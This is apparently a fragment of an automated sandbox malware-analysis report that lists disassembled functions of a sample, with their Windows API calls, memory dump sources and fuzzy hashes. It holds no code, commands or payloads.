                                                              Function 00411E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00411E55
                                                                • Part of subcall function 00413BBA: __EH_prolog.LIBCMT ref: 00413BBF
                                                              • _wcslen.LIBCMT ref: 00411EFD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$_wcslen
                                                              • String ID:
                                                              • API String ID: 2838827086-0
                                                              • Opcode ID: e683645b609bf6ecacb5bc58875dbbba22f4b4e25f6d55be19a04c6e57bec0d8
                                                              • Instruction ID: bc477512ecec195eeb1cd672b0fe5d74b7c2cd53fdca9cc3a04f9ceb197a38e8
                                                              • Opcode Fuzzy Hash: e683645b609bf6ecacb5bc58875dbbba22f4b4e25f6d55be19a04c6e57bec0d8
                                                              • Instruction Fuzzy Hash: CB316B71A042099FCF11EF99D945AEEFBF6AF58304F1000AEF545A3261C73A5E41CB68
                                                              Function 00419DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,004173BC,?,?,?,00000000), ref: 00419DBC
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00419E70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              • Opcode ID: 3192b07e2ac25fb26b0b5c7bd3f2a1f4b18e10655d9d0b4a4d3817f9edf71a75
                                                              • Instruction ID: 538c3df9f6f95798e4e55e06545fcd9125f9ba809d41d2170c7ec3d2c7bbe3f2
                                                              • Opcode Fuzzy Hash: 3192b07e2ac25fb26b0b5c7bd3f2a1f4b18e10655d9d0b4a4d3817f9edf71a75
                                                              • Instruction Fuzzy Hash: 0321EE31248346ABC714CF35D8A1AABBBE4AF51304F08491EF8C583681D32DEE4D8B66
                                                              Function 0041966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00419F27,?,?,0041771A), ref: 004196E6
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00419F27,?,?,0041771A), ref: 00419716
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 2ae5d13f71d8f63e0aba9d10bc542a416b36700646141b5e2c8510e94305e289
                                                              • Instruction ID: cd8b7453f5fea4e12ff3bc92d8d675c7fc16f1ca295aa384ed6bb6a5da89a092
                                                              • Opcode Fuzzy Hash: 2ae5d13f71d8f63e0aba9d10bc542a416b36700646141b5e2c8510e94305e289
                                                              • Instruction Fuzzy Hash: BC21BD71504344AFE3308A65CC89BE7B7DCEB59324F500A2AFAD5C26D1C778AC848676
                                                              Function 00419E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00419EC7
                                                              • GetLastError.KERNEL32 ref: 00419ED4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 0ef33a487d986d0d887d64cb8dae1f84cbfad94dc8ca66f4701520b821c6ea68
                                                              • Instruction ID: 74eb0cff3765549d34a3df2d722342934d9b5dc71d20ae540b19e43ebac67fc0
                                                              • Opcode Fuzzy Hash: 0ef33a487d986d0d887d64cb8dae1f84cbfad94dc8ca66f4701520b821c6ea68
                                                              • Instruction Fuzzy Hash: 2E11E930600700ABD724CB24C850BE7B7E9AB45361F50462BE553D26D0D778EDCAC768
                                                              Function 00438E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00438E75
                                                                • Part of subcall function 00438E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0043CA2C,00000000,?,00436CBE,?,00000008,?,004391E0,?,?,?), ref: 00438E38
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00451098,004117CE,?,?,00000007,?,?,?,004113D6,?,00000000), ref: 00438EB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocAllocate_free
                                                              • String ID:
                                                              • API String ID: 2447670028-0
                                                              • Opcode ID: 68eee254a734b21749f1ccf2a9d3cc3c1d4fe210ce9f2def9dae0d15acecae8f
                                                              • Instruction ID: 5177102df88313576552e50e8c488534e93a7df9053c42f484f6663e8dceb646
                                                              • Opcode Fuzzy Hash: 68eee254a734b21749f1ccf2a9d3cc3c1d4fe210ce9f2def9dae0d15acecae8f
                                                              • Instruction Fuzzy Hash: 44F0C23260131566DB212A769C06B6FF7589F99F70F24212FF818E6291DFACCD0181AD
                                                              Function 0042109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 004210AB
                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 004210B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: b07f844f202e6be3c7cd2d8643e8b398a969ffde903f062c09eaa99c80ecc0e2
                                                              • Instruction ID: 7431cf735148ea46bfc0835a56e43e221c68e0a78bf4d5721db6174ba0138af1
                                                              • Opcode Fuzzy Hash: b07f844f202e6be3c7cd2d8643e8b398a969ffde903f062c09eaa99c80ecc0e2
                                                              • Instruction Fuzzy Hash: 3EE0D836B01195A7CF0D8BB5AC059EF73EDEA552057104176E403D3611F938DE414664
                                                              Function 0041A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A501
                                                                • Part of subcall function 0041BB03: _wcslen.LIBCMT ref: 0041BB27
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0041A325,?,?,?,0041A175,?,00000001,00000000,?,?), ref: 0041A532
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 900141173a838c98c18c8c153e3a56a92ffa3525611977cf0a4a1ee6f583b40e
                                                              • Instruction ID: 1c853c31ef6476658b41f0a0fb84b51286cff034f0494a40335ef7762f34d619
                                                              • Opcode Fuzzy Hash: 900141173a838c98c18c8c153e3a56a92ffa3525611977cf0a4a1ee6f583b40e
                                                              • Instruction Fuzzy Hash: 8AF0E5312001097BDF019F61DC41FDA376DAF05785F848462B844D5160DB35DAD8DB54
                                                              Function 0041A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,0041977F,?,?,004195CF,?,?,?,?,?,00442641,000000FF), ref: 0041A1F1
                                                                • Part of subcall function 0041BB03: _wcslen.LIBCMT ref: 0041BB27
                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0041977F,?,?,004195CF,?,?,?,?,?,00442641), ref: 0041A21F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2643169976-0
                                                              • Opcode ID: f2b06597bd55c813d58261c3c3b2cb01e055d8a629263d71fa24b76dd7abfbad
                                                              • Instruction ID: 7fa3964a28bfe5af9f8d53b38b7fa8de10af1991e9c92ae43f11e9e0da28a955
                                                              • Opcode Fuzzy Hash: f2b06597bd55c813d58261c3c3b2cb01e055d8a629263d71fa24b76dd7abfbad
                                                              • Instruction Fuzzy Hash: 1EE068352002086BDB009F61DC41FDA336CAF0C7CAF480073B804D2150EB35DED4DA58
                                                              Function 0042AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00442641,000000FF), ref: 0042ACB0
                                                              • CoUninitialize.COMBASE(?,?,?,?,00442641,000000FF), ref: 0042ACB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: e4b53a87c82748637ebd0d022a79dd43452c8fa0ace4a4410546e46bbc380f2e
                                                              • Instruction ID: f0915dc0d0ff6b966f753a414159495a0d3e9edda2933c6d9e2a2fe1be43ae8d
                                                              • Opcode Fuzzy Hash: e4b53a87c82748637ebd0d022a79dd43452c8fa0ace4a4410546e46bbc380f2e
                                                              • Instruction Fuzzy Hash: D5E06572604650EFC700DF59DC06B45FBACFB49B20F50426AF416D3760CB74A840CA98
                                                              Function 0041A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,0041A23A,?,0041755C,?,?,?,?), ref: 0041A254
                                                                • Part of subcall function 0041BB03: _wcslen.LIBCMT ref: 0041BB27
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0041A23A,?,0041755C,?,?,?,?), ref: 0041A280
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 8ea3cc56c4c53a048738d4b4d5709ca2c353cf2ed649050feeb407755ac057a0
                                                              • Instruction ID: 856adbc3c85fae65b3b0752ee6e4450371e273172e2831262f30d9453aa7870d
                                                              • Opcode Fuzzy Hash: 8ea3cc56c4c53a048738d4b4d5709ca2c353cf2ed649050feeb407755ac057a0
                                                              • Instruction Fuzzy Hash: E8E092355001245BCB11EB65DC05BDA77A8AB097E6F0442B2FD44E3294D774DE84CAE9
                                                              Function 0042DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 0042DEEC
                                                                • Part of subcall function 00414092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004140A5
                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 0042DF03
                                                                • Part of subcall function 0042B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0042B579
                                                                • Part of subcall function 0042B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0042B58A
                                                                • Part of subcall function 0042B568: IsDialogMessageW.USER32(0001041E,?), ref: 0042B59E
                                                                • Part of subcall function 0042B568: TranslateMessage.USER32(?), ref: 0042B5AC
                                                                • Part of subcall function 0042B568: DispatchMessageW.USER32(?), ref: 0042B5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                              • String ID:
                                                              • API String ID: 2718869927-0
                                                              • Opcode ID: 878ab55ebdc2a26c0cbd6441f9336b4b401f76da6aab637815c9076f50dccec5
                                                              • Instruction ID: 0435dda40d1ed7cee5554f6c5642076449c971ca5b614545909626c56e1af989
                                                              • Opcode Fuzzy Hash: 878ab55ebdc2a26c0cbd6441f9336b4b401f76da6aab637815c9076f50dccec5
                                                              • Instruction Fuzzy Hash: F8E09B7550035826DF01AB63DC06FDE3B6C9B057CAF84046AB644EA0A3EA7DE6508769
                                                              Function 0042081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00420836
                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0041F2D8,Crypt32.dll,00000000,0041F35C,?,?,0041F33E,?,?,?), ref: 00420858
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: 633cb2cc96e0a156b1ab48c2b27f8dd9aab2eb89fc73d9339f634bcf4622a139
                                                              • Instruction ID: d9f036043dc8f18d541bca6d475b9a1941918cab57638081b5700680750f1edc
                                                              • Opcode Fuzzy Hash: 633cb2cc96e0a156b1ab48c2b27f8dd9aab2eb89fc73d9339f634bcf4622a139
                                                              • Instruction Fuzzy Hash: 4FE012765001286ADB11AB95AC45FDB7BACEF097D2F44006A7645E2104DA78DA848AA4
                                                              Function 0042A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0042A3DA
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0042A3E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: 5e5a785e2db3fcffec38c64331236a0acb44a3f18e9a1e3772cea743dd3cf3fd
                                                              • Instruction ID: d59f9176ee3027dcc3ecaa94946aa05b4771cc0ad378c7d0f54509a559e354fb
                                                              • Opcode Fuzzy Hash: 5e5a785e2db3fcffec38c64331236a0acb44a3f18e9a1e3772cea743dd3cf3fd
                                                              • Instruction Fuzzy Hash: 65E0ED71600228EBDB10DF56D541799BBE8EF05364F50C05BA84697201E778AE04DB95
                                                              Function 00432B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00432BAA
                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00432BB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                              • String ID:
                                                              • API String ID: 1660781231-0
                                                              • Opcode ID: b52a5eef7afb466f31c092721e3650c0cb2d579f96358660bba70bdde74ed462
                                                              • Instruction ID: ce53a6cf4108b82671a4e2abc1ab6495659b20e65952ebe05e0afb2eda0c55f1
                                                              • Opcode Fuzzy Hash: b52a5eef7afb466f31c092721e3650c0cb2d579f96358660bba70bdde74ed462
                                                              • Instruction Fuzzy Hash: E8D0A939154200285C142FB23B02A8AB345AD4AB7AFB0729FF020955C1EADCA240A02E
                                                              Function 004112F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_410000_DCobxod.jbxd
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: 61a0f356e726448f03dbed2c39ead234584b38aceed739c192b385c2ce52baeb
                                                              • Instruction ID: bcec707ea75a74b659d51eb4f71fa03bef3d5cd0fd06c423312dd4f5320d725b
                                                              • Opcode Fuzzy Hash: 61a0f356e726448f03dbed2c39ead234584b38aceed739c192b385c2ce52baeb
                                                              • Instruction Fuzzy Hash: C8C0123205C200FECB010FB4DC09C2BBBA8EBA5312F04C928B0A9C0060CA38C950EB12
                                                              Function 00411A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063992944.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true
                                                              • Associated: 00000000.00000002.2063951055.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064063294.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064089618.0000000000472000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2064177730.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
